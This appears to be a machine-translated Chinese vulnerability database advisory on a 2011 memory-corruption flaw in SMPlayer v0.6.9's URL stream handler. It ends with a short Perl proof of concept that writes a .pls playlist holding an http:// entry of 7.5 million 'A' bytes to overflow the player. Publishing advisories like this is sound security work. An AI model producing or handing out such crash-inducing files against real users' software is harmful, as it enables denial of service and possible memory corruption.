SMPlayer v0.6.9 URL Stream 内存损坏

CVSS 元临时分数	当前攻击价格 (≈)	CTI兴趣分数
4.8	$0-$5k	0.00

摘要信息

在SMPlayer v0.6.9 中曾发现分类为致命的漏洞。相关的是未知函数，在URL Stream Handler组件中。当被操控时，会导致内存损坏。此外，存在可用的漏洞利用。

在SMPlayer v0.6.9 中曾发现分类为致命的漏洞。相关的是未知函数，在URL Stream Handler组件中。当被操控时，会导致内存损坏。漏洞的CWE定义是 CWE-119。此漏洞的脆弱性 2011-08-19由公示人Pim Campers (X4lt)、公示人身份VL-ID 64、公示人类型为公告 (网站)所披露。您可以在 vulnerability-lab.com 下载该通告。

没有可用的技术细节。该漏洞的普及率低于常规水平。此外，存在可用的漏洞利用。漏洞利用已被公开，可能会被利用。当前，大致为 USD $0-$5k。

若有长度，则其被标记为概念验证。以下网址提供该漏洞利用：vulnerability-lab.com。我们估计的零日攻击价值约为$0-$5k。此漏洞利用的代码如下：

#!/usr/bin/perl
=gnk
     
=cut
##############################################################################
###################################################################
my $header1="[playlist]\n";
my $header2="NumberOfEntries=1\n";
my $header3="File1=http://";
my $bof="\x41" x 7500000;
###################################################################
open(myfile,'>> 7500000.pls');
print myfile $header1.$header2.$header3.$bof;
###################################################################